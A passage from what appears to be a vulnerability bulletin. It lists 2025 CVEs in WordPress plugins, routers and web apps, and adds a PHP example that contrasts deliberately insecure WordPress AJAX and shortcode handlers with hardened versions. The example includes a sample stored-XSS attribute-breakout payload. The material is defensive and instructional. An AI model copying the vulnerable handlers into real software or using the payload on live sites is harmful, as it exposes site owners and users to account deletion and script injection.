| torod--Torod The smart shipping and delivery portal for e-shops and retailers | The Torod - The smart shipping and delivery portal for e-shops and retailers plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9. This is due to missing or incorrect nonce validation on the save_settings function. This makes it possible for unauthenticated attackers to modify plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-12373 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1eedab61-e94b-4793-8bf6-cfadd94a5778?source=cve https://plugins.trac.wordpress.org/browser/torod/tags/1.9/inc/torod_Settings.php#L80 |
| TOZED--ZLT M30S | A vulnerability was determined in TOZED ZLT M30S and ZLT M30S PRO 1.47/3.09.06. This impacts an unknown function of the file /reqproc/proc_post of the component Web Interface. Executing manipulation of the argument goformId with the input REBOOT_DEVICE can lead to denial of service. The attack can only be done within the local network. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 4.3 | CVE-2025-14105 | VDB-334487: TOZED ZLT M30S/ZLT M30S PRO Web proc_post denial of service; VDB-334487: CTI Indicators (IOB, IOC, IOA); Submit #696740: ZLT M30S & M30S PRO MTNNGRM30S_1.47, M30SPRO_3.09.06 (Other versions might be vulnerable) Denial of Service; https://youtu.be/RNgsrnPPxgQ |
| tunilame--CSS3 Buttons | The CSS3 Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'button' shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13907 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c1f71ffb-f09c-40f6-b65e-af30ce155466?source=cve https://plugins.trac.wordpress.org/browser/css3-buttons/trunk/css3-buttons.php#L59 https://plugins.trac.wordpress.org/browser/css3-buttons/tags/0.1/css3-buttons.php#L59 |
| Tyche Softwares--Arconix Shortcodes | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tyche Softwares Arconix Shortcodes allows Stored XSS. This issue affects Arconix Shortcodes: from n/a through 2.1.19. | 2025-12-01 | 6.5 | CVE-2025-13835 | https://vdp.patchstack.com/database/wordpress/plugin/arconix-shortcodes/vulnerability/wordpress-arconix-shortcodes-plugin-2-1-19-cross-site-scripting-xss-vulnerability?_s_id=cve |
| TykoDev--cherry-studio-TykoFork | A vulnerability has been found in TykoDev cherry-studio-TykoFork 0.1. This issue affects the function redirectToAuthorization of the file /.well-known/oauth-authorization-server of the component OAuth Server Discovery. Such manipulation of the argument authorizationUrl leads to os command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. | 2025-12-07 | 6.3 | CVE-2025-14204 | VDB-334647: TykoDev cherry-studio-TykoFork OAuth Server Discovery oauth-authorization-server redirectToAuthorization os command injection; VDB-334647: CTI Indicators (IOB, IOC, TTP, IOA); Submit #700182: GitHub cherry-studio-TykoFork 0.0.1 OS Command Injection; https://lavender-bicycle-a5a.notion.site/TokyoTech-RCE-26153a41781f80b6a370d427a6d307f0 |
| UTT--进取 520W | A vulnerability was detected in UTT 进取 520W 1.7.7-180627. The affected element is the function strcpy of the file /goform/websHostFilter. Performing manipulation of the argument addHostFilter results in buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 6.5 | CVE-2025-14140 | VDB-334528: UTT 进取 520W websHostFilter strcpy buffer overflow; VDB-334528: CTI Indicators (IOB, IOC, IOA); Submit #698521: UTT 进取 520W v3v1.7.7-180627 Buffer Overflow; https://github.com/cymiao1978/cve/blob/main/new/12.md https://github.com/cymiao1978/cve/blob/main/new/12.md#poc |
| UTT--进取 520W | A security vulnerability has been detected in UTT 进取 520W 1.7.7-180627. Impacted is the function strcpy of the file /goform/formConfigDnsFilterGlobal. Such manipulation of the argument timeRangeName leads to buffer overflow. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-06 | 5.7 | CVE-2025-14139 | VDB-334527: UTT 进取 520W formConfigDnsFilterGlobal strcpy buffer overflow; VDB-334527: CTI Indicators (IOB, IOC, IOA); Submit #698520: UTT 进取 520W v3v1.7.7-180627 Buffer Overflow; https://github.com/cymiao1978/cve/blob/main/new/11.md https://github.com/cymiao1978/cve/blob/main/new/11.md#poc |
| Verysync--微力同步 | A flaw has been found in Verysync 微力同步 up to 2.21.3. This impacts an unknown function of the file /rest/f/api/resources/f96956469e7be39d/tmp/text.txt?override=false of the component Web Administration Module. Executing manipulation can lead to unrestricted upload. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 6.3 | CVE-2025-14199 | VDB-334619: Verysync 微力同步 Web Administration text.txt unrestricted upload; VDB-334619: CTI Indicators (IOB, IOC, TTP, IOA); Submit #699539: Beijing Weili Digital Technology Co., Ltd 微力同步 v2.21.3 Upload Any File; https://github.com/jjjjj-zr/jjjjjzr/issues/10 |
| Verysync--微力同步 | A security vulnerability has been detected in Verysync 微力同步 up to 2.21.3. The impacted element is an unknown function of the file /rest/f/api/resources/f96956469e7be39d of the component Web Administration Module. Such manipulation leads to information disclosure. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 5.3 | CVE-2025-14197 | VDB-334617: Verysync 微力同步 Web Administration f96956469e7be39d information disclosure; VDB-334617: CTI Indicators (IOB, IOC, TTP, IOA); Submit #699498: Beijing Weili Digital Technology Co., Ltd 微力同步 v2.21.3 Unauthorized Access; Submit #699537: Beijing Weili Digital Technology Co., Ltd 微力同步 v2.21.3 Arbitrary File Read (Duplicate); https://github.com/jjjjj-zr/jjjjjzr/issues/6 https://github.com/jjjjj-zr/jjjjjzr/issues/8 |
| Verysync--微力同步 | A vulnerability was detected in Verysync 微力同步 2.21.3. This affects an unknown function of the file /safebrowsing/clientreport/download?key=dummytoken of the component Web Administration Module. Performing manipulation results in information disclosure. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 5.3 | CVE-2025-14198 | VDB-334618: Verysync 微力同步 Web Administration download information disclosure; VDB-334618: CTI Indicators (IOB, IOC, TTP, IOA); Submit #699533: Beijing Weili Digital Technology Co., Ltd 微力同步 v2.21.3 Download any file; https://github.com/jjjjj-zr/jjjjjzr/issues/7 |
| voidek--Voidek Employee Portal | The Voidek Employee Portal plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several AJAX actions in all versions up to, and including, 1.0.6. This makes it possible for unauthenticated attackers to perform several actions like registering an account, deleting users, and modifying details within the employee portal. | 2025-12-05 | 5.3 | CVE-2025-12093 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d33b83d5-cfc0-48b6-a54e-1ae8ac52aae1?source=cve https://wordpress.org/plugins/voidek-employee-portal/ |
| watchful--Backup, Restore and Migrate your sites with XCloner | The Backup, Restore and Migrate your sites with XCloner plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.8.2. This is due to missing or incorrect nonce validation on the Xcloner_Remote_Storage:save() function. This makes it possible for unauthenticated attackers to add or modify an FTP backup configuration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Successful exploitation allows an attacker to set an attacker-controlled FTP site for backup storage and exfiltrate potentially sensitive site data. | 2025-12-05 | 4.3 | CVE-2025-11759 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a76a8e36-635a-48a3-8683-c24a0395212e?source=cve https://plugins.trac.wordpress.org/changeset/3398881/xcloner-backup-and-restore |
| wcvendors--WC Vendors WooCommerce Multivendor, WooCommerce Marketplace, Product Vendors | The WC Vendors - WooCommerce Multivendor, WooCommerce Marketplace, Product Vendors plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.4. This is due to missing or incorrect nonce validation on the /vendor_dashboard/product/delete/ endpoint. This makes it possible for unauthenticated attackers to delete vendor products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-05 | 4.3 | CVE-2025-12130 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e1ed77cf-2595-477a-af86-25c917817984?source=cve https://plugins.trac.wordpress.org/changeset/3408849/wc-vendors/trunk/classes/front/class-wcv-product-controller.php |
| webdevstudios--Custom Post Type UI | The Custom Post Type UI plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.18.0. This is due to the plugin not verifying that a user has the required capability to perform actions in the "cptui_process_post_type" function. This makes it possible for authenticated attackers, with subscriber level access and above, to add, edit, or delete custom post types in limited situations. | 2025-12-04 | 4.8 | CVE-2025-12826 | https://www.wordfence.com/threat-intel/vulnerabilities/id/90d203b1-9426-4eff-b566-02c8a1c6adfa?source=cve https://github.com/WebDevStudios/custom-post-type-ui/commit/215779a5ac0c624f0dcf875e87305b4898d5bcf9 |
| webradykal--Easy Jump Links Menus | The Easy Jump Links Menus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `h_tags` parameter in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 6.4 | CVE-2025-13860 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e3e88dc0-4798-4da8-87cf-4c398acc622c?source=cve https://plugins.trac.wordpress.org/browser/easy-jump-links-menus/trunk/easy-jump-links-menus.php#L52 https://plugins.trac.wordpress.org/browser/easy-jump-links-menus/tags/1.0.0/easy-jump-links-menus.php#L52 |
| wedevs--weDocs: AI Powered Knowledge Base, Docs, Documentation, Wiki & AI Chatbot | The weDocs plugin for WordPress is vulnerable to unauthorized access in all versions up to, and including, 2.1.14. This is due to the plugin not properly verifying that a user is authorized to perform an action in the create_item_permissions_check function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify global plugin settings. | 2025-12-06 | 5.4 | CVE-2025-12505 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3ec54ec6-0ff1-4290-85d0-d691a1832627?source=cve https://github.com/weDevsOfficial/wedocs-plugin/blob/develop/includes/API/SettingsApi.php https://plugins.trac.wordpress.org/browser/wedocs/tags/2.1.13/includes/API/SettingsApi.php#L115 https://plugins.trac.wordpress.org/browser/wedocs/tags/2.1.13/includes/API/SettingsApi.php#L179 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3403375%40wedocs%2Ftrunk&old=3382516%40wedocs%2Ftrunk&sfp_email=&sfph_mail= |
| Wireshark Foundation--Wireshark | HTTP3 dissector crash in Wireshark 4.6.0 and 4.6.1 allows denial of service | 2025-12-03 | 5.5 | CVE-2025-13945 | https://www.wireshark.org/security/wnpa-sec-2025-07.html GitLab Issue #20860 |
| Wireshark Foundation--Wireshark | MEGACO dissector infinite loop in Wireshark 4.6.0 to 4.6.1 and 4.4.0 to 4.4.11 allows denial of service | 2025-12-03 | 5.5 | CVE-2025-13946 | https://www.wireshark.org/security/wnpa-sec-2025-08.html GitLab Issue #20884 |
| wpblockart--BlockArt Blocks Gutenberg Blocks, Page Builder Blocks ,WordPress Block Plugin, Sections & Template Library | The BlockArt Blocks - Gutenberg Blocks, Page Builder Blocks ,WordPress Block Plugin, Sections & Template Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'timestamp' attribute in all versions up to, and including, 2.2.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-02 | 6.4 | CVE-2025-13697 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b91364fa-7046-427f-84ee-6a36d49bb80f?source=cve https://plugins.trac.wordpress.org/changeset/3404884/ |
| wpdevelop--Booking Calendar | The Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin 'bookingcalendar' shortcode in all versions up to, and including, 10.14.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 6.4 | CVE-2025-12804 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ad993a62-457a-494f-a7c8-256b808d18c0?source=cve https://plugins.trac.wordpress.org/changeset/3391614/booking |
| wpdiscover--Social Feed Gallery Portfolio | The Social Feed Gallery Portfolio plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter of the [igp-wp] shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-06 | 6.4 | CVE-2025-13896 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2a275deb-a0e3-491a-bed6-9f6112918061?source=cve https://plugins.trac.wordpress.org/browser/social-feed-gallery-portfolio/trunk/includes/public/class-portfolio-shortcode.php#L58 https://plugins.trac.wordpress.org/browser/social-feed-gallery-portfolio/tags/1.3/includes/public/class-portfolio-shortcode.php#L58 https://plugins.trac.wordpress.org/browser/social-feed-gallery-portfolio/trunk/includes/public/class-portfolio-shortcode.php#L208 https://plugins.trac.wordpress.org/browser/social-feed-gallery-portfolio/tags/1.3/includes/public/class-portfolio-shortcode.php#L208 |
| wpeka-club--SurveyFunnel Survey Plugin for WordPress | The SurveyFunnel - Survey Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'surveyfunnel_lite_survey' shortcode in all versions up to, and including, 1.1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 6.4 | CVE-2025-12417 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2d13aadf-c144-4919-9bbd-54cb26cf2527?source=cve https://plugins.trac.wordpress.org/browser/surveyfunnel-lite/tags/1.1.5/public/class-surveyfunnel-lite-public.php#L240 https://developer.wordpress.org/apis/security/escaping/ |
| wpeka-club--SurveyFunnel Survey Plugin for WordPress | The SurveyFunnel - Survey Plugin for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.5 via several unprotected /wp-json/surveyfunnel/v2/ REST API endpoints. This makes it possible for unauthenticated attackers to extract sensitive data from survey responses. | 2025-12-05 | 5.3 | CVE-2025-13006 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f43f69f0-6995-4789-acf3-8019227effe1?source=cve https://github.com/wpeka/surveyfunnel-lite/blob/master/includes/class-surveyfunnel-lite-rest-api.php https://plugins.trac.wordpress.org/browser/surveyfunnel-lite/tags/1.1.5/includes/class-surveyfunnel-lite-rest-api.php |
| wpforchurch--Sermon Manager | The Sermon Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `sermon-views` shortcode in all versions up to, and including, 2.30.0. This is due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-05 | 6.4 | CVE-2025-12368 | https://www.wordfence.com/threat-intel/vulnerabilities/id/41116b52-8f94-4d29-8845-a27bdf817b43?source=cve https://wordpress.org/plugins/sermon-manager-for-wordpress https://plugins.trac.wordpress.org/browser/sermon-manager-for-wordpress/tags/2.30.0/includes/vendor/entry-views.php#L114 |
| wpmanageninja--FluentCart A New Era of eCommerce Faster, Lighter, and Simpler | The FluentCart plugin for WordPress is vulnerable to SQL Injection via the 'groupKey' parameter in all versions up to, and including, 1.3.1. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-03 | 4.9 | CVE-2025-13495 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2000b23f-d8a2-4b83-9bf7-b90cb16718f3?source=cve https://plugins.trac.wordpress.org/browser/fluent-cart/trunk/app/Services/Report/RevenueReportService.php#L76 https://plugins.trac.wordpress.org/browser/fluent-cart/tags/1.3.0/app/Services/Report/RevenueReportService.php#L76 https://plugins.trac.wordpress.org/changeset/3408039/fluent-cart/tags/1.3.2/app/Services/Report/ReportHelper.php |
| xbenx--WP Landing Page | The WP Landing Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.3. This is due to missing nonce validation on the 'wplp_api_update_text' function. This makes it possible for unauthenticated attackers to update arbitrary post meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-06 | 4.3 | CVE-2025-13629 | https://www.wordfence.com/threat-intel/vulnerabilities/id/43d8576b-e6ad-4e0a-b99f-948ba36f53ff?source=cve https://plugins.trac.wordpress.org/browser/wp-landing-page/trunk/includes/wplp-api.php#L14 https://plugins.trac.wordpress.org/browser/wp-landing-page/tags/0.9.3/includes/wplp-api.php#L14 |
| xerrors--Yuxi-Know | A vulnerability was detected in xerrors Yuxi-Know up to 0.4.0. This vulnerability affects the function OtherEmbedding.aencode of the file /src/models/embed.py. Performing manipulation of the argument health_url results in server-side request forgery. The attack can be initiated remotely. The exploit is now public and may be used. The patch is named 0ff771dc1933d5a6b78f804115e78a7d8625c3f3. To fix this issue, it is recommended to deploy a patch. The vendor responded with a vulnerability confirmation and a list of security measures they have established already (e.g. disabled URL parsing, disabled URL upload mode, removed URL-to-markdown conversion). | 2025-12-05 | 4.7 | CVE-2025-14116 | VDB-334492 | xerrors Yuxi-Know embed.py OtherEmbedding.aencode server-side request forgery VDB-334492 | CTI Indicators (IOB, IOC, IOA) Submit #697380 | xerrors Yuxi-Know Yuxi-Know ≤ 0.4.0 Server-Side Request Forgery https://www.notion.so/SSRF-vulnerablity-in-Yuxi-Know-2afea92a3c4180bea524f1a253f8d9a0?source=copy_link https://github.com/xerrors/Yuxi-Know/commit/0ff771dc1933d5a6b78f804115e78a7d8625c3f3 |
| yhirose--cpp-httplib | cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.27.0, a vulnerability allows attacker-controlled HTTP headers to influence server-visible metadata, logging, and authorization decisions. An attacker can supply X-Forwarded-For or X-Real-IP headers which get accepted unconditionally by get_client_ip() in docker/main.cc, causing access and error logs (nginx_access_logger / nginx_error_logger) to record spoofed client IPs (log poisoning / audit evasion). This vulnerability is fixed in 0.27.0. | 2025-12-05 | 5.3 | CVE-2025-66577 | https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-gfpf-r66f-5mh2 https://github.com/yhirose/cpp-httplib/commit/ac9ebb0ee333ce8bf13523f487bdfad9518a2aff |
| Yohann0617--oci-helper | A weakness has been identified in Yohann0617 oci-helper up to 3.2.4. This issue affects the function addCfg of the file src/main/java/com/yohann/ocihelper/service/impl/OciServiceImpl.java of the component OCI Configuration Upload. Executing manipulation of the argument File can lead to path traversal. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-02 | 6.3 | CVE-2025-13875 | VDB-334031 | Yohann0617 oci-helper OCI Configuration Upload OciServiceImpl.java addCfg path traversal VDB-334031 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692125 | yohann( https://github.com/Yohann0617 ) oci-helper <=V3.2.4 Directory/Path Traversal https://github.com/Xzzz111/exps/blob/main/archives/oci-helper-path-traversal-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/oci-helper-path-traversal-1/report.md#proof-of-concept |
| Yonyou--U8 Cloud | A vulnerability was identified in Yonyou U8 Cloud 5.0/5.0sp/5.1/5.1sp. The affected element is an unknown function of the file nc/pubitf/erm/mobile/appservice/AppServletService.class. Such manipulation of the argument usercode leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 6.3 | CVE-2025-14185 | VDB-334605 | Yonyou U8 Cloud AppServletService.class sql injection VDB-334605 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698601 | Yonyou Network Technology Co., Ltd. U8 Cloud 5.0,5.0sp,5.1,5.1sp SQL Injection https://github.com/798xuezhiqian-collab/vuln01 |
| youlaitech--youlai-mall | A flaw has been found in youlaitech youlai-mall 1.0.0/2.0.0. Affected is the function getById/updateAddress/deleteAddress of the file /mall-ums/app-api/v1/addresses/. Executing manipulation can lead to improper control of dynamically-identified variables. The attack can be executed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 6.3 | CVE-2025-14051 | VDB-334367 | youlaitech youlai-mall addresses deleteAddress improper control of dynamically-identified variables VDB-334367 | CTI Indicators (IOB, IOC, IOA) Submit #694827 | youlai-mall latest Improper Control of Resource Identifiers Submit #694836 | youlai-mall latest Improper Control of Resource Identifiers (Duplicate) Submit #694837 | youlai-mall latest Improper Control of Resource Identifiers (Duplicate) https://github.com/Hwwg/cve/issues/18 https://github.com/Hwwg/cve/issues/19 |
| youlaitech--youlai-mall | A vulnerability has been found in youlaitech youlai-mall 1.0.0/2.0.0. Affected by this vulnerability is the function getMemberById of the file /mall-ums/app-api/v1/members/. The manipulation of the argument memberId leads to improper access controls. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 6.3 | CVE-2025-14052 | VDB-334368 | youlaitech youlai-mall members getMemberById access control VDB-334368 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #694854 | youlai-mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/21 |
| youlaitech--youlai-mall | A vulnerability has been found in youlaitech youlai-mall 1.0.0/2.0.0. This impacts an unknown function of the file /app-api/v1/orders/. The manipulation of the argument orderId leads to improper control of dynamically-identified variables. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 6.3 | CVE-2025-14085 | VDB-334476 | youlaitech youlai-mall orders improper control of dynamically-identified variables VDB-334476 | CTI Indicators (IOB, IOC, IOA) Submit #695943 | youlai-mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/23 |
| youlaitech--youlai-mall | A vulnerability was found in youlaitech youlai-mall 1.0.0/2.0.0. Affected is an unknown function of the file /app-api/v1/members/openid/. The manipulation of the argument openid results in improper access controls. The attack can be executed remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 6.3 | CVE-2025-14086 | VDB-334477 | youlaitech youlai-mall openid access control VDB-334477 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #695945 | youlai-mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/25 |
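Most of the WordPress rows above are the same three missing controls: no nonce on an AJAX handler (CSRF), no capability check (authorization bypass), an unprotected REST route, and shortcode attributes echoed without escaping (stored XSS). The following is an added example, not code from any plugin listed in this bulletin; it assumes it runs inside WordPress (so `check_ajax_referer`, `current_user_can`, `register_rest_route`, `esc_attr`, `esc_html` and friends exist) and every `demo_*` name and the `demo-admin` script handle are hypothetical.

```php
<?php
/**
 * Added example; not code from any plugin listed above. It shows the controls
 * whose absence the WordPress rows describe: a nonce on AJAX handlers (CSRF),
 * a capability check (authorization), a permission_callback on REST routes,
 * and context-aware escaping of shortcode attributes (stored XSS).
 * Assumes it runs inside WordPress; every demo_* name is hypothetical.
 */

// --- AJAX: vulnerable shape (the "missing capability check" / "missing nonce" rows) ---
// Typically wired as:
//   add_action( 'wp_ajax_demo_delete_user', 'demo_delete_user_vulnerable' );
//   add_action( 'wp_ajax_nopriv_demo_delete_user', 'demo_delete_user_vulnerable' );
// The nopriv hook exposes it to logged-out visitors; with no nonce and no
// current_user_can() any request to admin-ajax.php?action=demo_delete_user works.
function demo_delete_user_vulnerable() {
    $user_id = absint( $_POST['user_id'] ?? 0 );
    require_once ABSPATH . 'wp-admin/includes/user.php';
    wp_delete_user( $user_id );
    wp_send_json_success();
}

// --- AJAX: hardened shape ---
function demo_delete_user_hardened() {
    // 1. CSRF: the request must carry a nonce minted for this action.
    //    check_ajax_referer() terminates the request if it does not verify.
    check_ajax_referer( 'demo_delete_user', 'nonce' );

    // 2. Authorization: a nonce is not a permission. Any logged-in user,
    //    including a Subscriber, can obtain one, so check the capability too.
    if ( ! current_user_can( 'delete_users' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $user_id = absint( $_POST['user_id'] ?? 0 );
    if ( 0 === $user_id || get_current_user_id() === $user_id ) {
        wp_send_json_error( 'bad user id', 400 );
    }
    require_once ABSPATH . 'wp-admin/includes/user.php';
    wp_delete_user( $user_id );
    wp_send_json_success();
}
// Only the logged-in hook; unauthenticated callers have no business here.
add_action( 'wp_ajax_demo_delete_user', 'demo_delete_user_hardened' );

// The admin page that issues the request gets its nonce from the server
// (assumes a registered script handle 'demo-admin').
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'demo-admin', 'demoAjax', array(
        'nonce' => wp_create_nonce( 'demo_delete_user' ),
    ) );
} );

// --- REST: the "unprotected REST API endpoint" rows are a permission_callback
//     that returns true (or a permission check that never looks at the caller).
//     Bind it to a capability instead. ---
add_action( 'rest_api_init', function () {
    register_rest_route( 'demo/v1', '/settings', array(
        'methods'             => 'POST',
        'callback'            => function ( WP_REST_Request $req ) {
            $value = sanitize_text_field( (string) $req->get_param( 'value' ) );
            update_option( 'demo_settings', $value );
            return rest_ensure_response( array( 'ok' => true ) );
        },
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
    ) );
} );

// --- Shortcodes: Contributors can place them, so every attribute is attacker
//     input and must be escaped for the context it lands in. ---
function demo_box_vulnerable( $atts ) {
    $atts = shortcode_atts( array( 'id' => '', 'title' => '' ), $atts, 'demo_box' );
    // [demo_box id='x" onmouseover="alert(1)'] breaks out of the attribute.
    return '<div id="' . $atts['id'] . '">' . $atts['title'] . '</div>';
}

function demo_box_hardened( $atts ) {
    $atts = shortcode_atts( array( 'id' => '', 'title' => '' ), $atts, 'demo_box' );
    return sprintf(
        '<div id="%s">%s</div>',
        esc_attr( $atts['id'] ),   // attribute context
        esc_html( $atts['title'] ) // text-node context
    );
}
add_shortcode( 'demo_box', 'demo_box_hardened' );
```

When auditing a plugin for the pattern in these rows, grep for `wp_ajax_nopriv_` hooks and `'permission_callback' => '__return_true'`, then confirm each remaining handler calls both a nonce check and a `current_user_can()` check before it writes; a handler that has only the nonce is still reachable by every Subscriber.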

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| alokjaiswal--Hotel-Management-services-using-MYSQL-and-php | A vulnerability has been found in alokjaiswal Hotel-Management-services-using-MYSQL-and-php up to 5f8b60a7aa6c06a5632de569d4e3f6a8cd82f76f. Affected is an unknown function of the file /usersub.php of the component Request Pending Page. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected or updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 3.5 | CVE-2025-14200 | VDB-334620 | alokjaiswal Hotel-Management-services-using-MYSQL-and-php Request Pending usersub.php cross site scripting VDB-334620 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699993 | Hotel-Management-services-using-MYSQL-and-php web web 1 xxs vnlerability https://github.com/Yh276/h0202/blob/main/Hotel-Management-services-using-MYSQL-and-php%20web%202xxs.docx |
| alokjaiswal--Hotel-Management-services-using-MYSQL-and-php | A vulnerability was found in alokjaiswal Hotel-Management-services-using-MYSQL-and-php up to 5f8b60a7aa6c06a5632de569d4e3f6a8cd82f76f. Affected by this vulnerability is an unknown functionality of the file /dishsub.php. The manipulation of the argument item.name results in cross site scripting. It is possible to launch the attack remotely. The exploit has been made public and could be used. This product takes the approach of rolling releases to provide continuous delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 2.4 | CVE-2025-14201 | VDB-334621 | alokjaiswal Hotel-Management-services-using-MYSQL-and-php dishsub.php cross site scripting VDB-334621 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699994 | Hotel-Management-services-using-MYSQL-and-php web 1 web 1 XSS vulnerability https://github.com/Yh276/h0202/blob/main/Hotel-Management-services-using-MYSQL-and-php%20web%201%20xxs.docx |
| code-projects--Chamber of Commerce Membership Management System | A vulnerability was found in code-projects Chamber of Commerce Membership Management System 1.0. Impacted is an unknown function of the file /membership_profile.php of the component Your Info Handler. Performing manipulation of the argument Full Name/Address/City/State results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been made public and could be used. | 2025-12-07 | 2.4 | CVE-2025-14205 | VDB-334648 | code-projects Chamber of Commerce Membership Management System Your Info membership_profile.php cross site scripting VDB-334648 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700421 | code-projects Chamber of Commerce Membership Management System In PHP With Source Code V1.0 Improper Neutralization of Alternate XSS Syntax https://www.yuque.com/u42535181/pm5nde/ky49h1xg6si9d3m8#zdDXX https://code-projects.org/ |
